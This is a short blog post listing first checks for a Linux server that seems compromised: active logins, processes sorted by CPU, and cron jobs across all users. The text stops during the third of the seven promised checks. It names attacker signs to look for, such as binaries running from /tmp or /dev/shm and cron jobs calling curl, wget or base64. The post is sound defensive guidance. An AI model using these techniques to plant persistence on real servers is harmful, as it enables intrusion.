What I Check First When a Linux Server Starts Acting Suspicious

✍️ Full Blog Content:

Intro:

Your server’s acting strange — maybe it’s lagging, maybe you’re seeing weird logs, or users are locked out. Before panic sets in, there’s a checklist I run through that helps me figure out what’s happening — fast. These are the first 7 things I check when a Linux server smells even a little bit wrong.

1. Who’s Logged In (Right Now)

who
w

✅ Look for:

• Users logged in that shouldn’t be
• Multiple logins from odd IPs
• Sessions active at strange hours

2. What Processes Are Running

ps aux --sort=-%cpu | head

✅ Watch for:

• Shells or binaries running from /tmp or /dev/shm
• Long-running scripts
• Unusual process names (misspelled system commands)

3. Any New Cron Jobs?

for user in $(cut -f1 -d: /etc/passwd); do crontab -l -u $user 2>/dev/null; done
ls -l /etc/cron* /var/spool/cron

✅ Red flags:

• Jobs calling curl, wget, or base64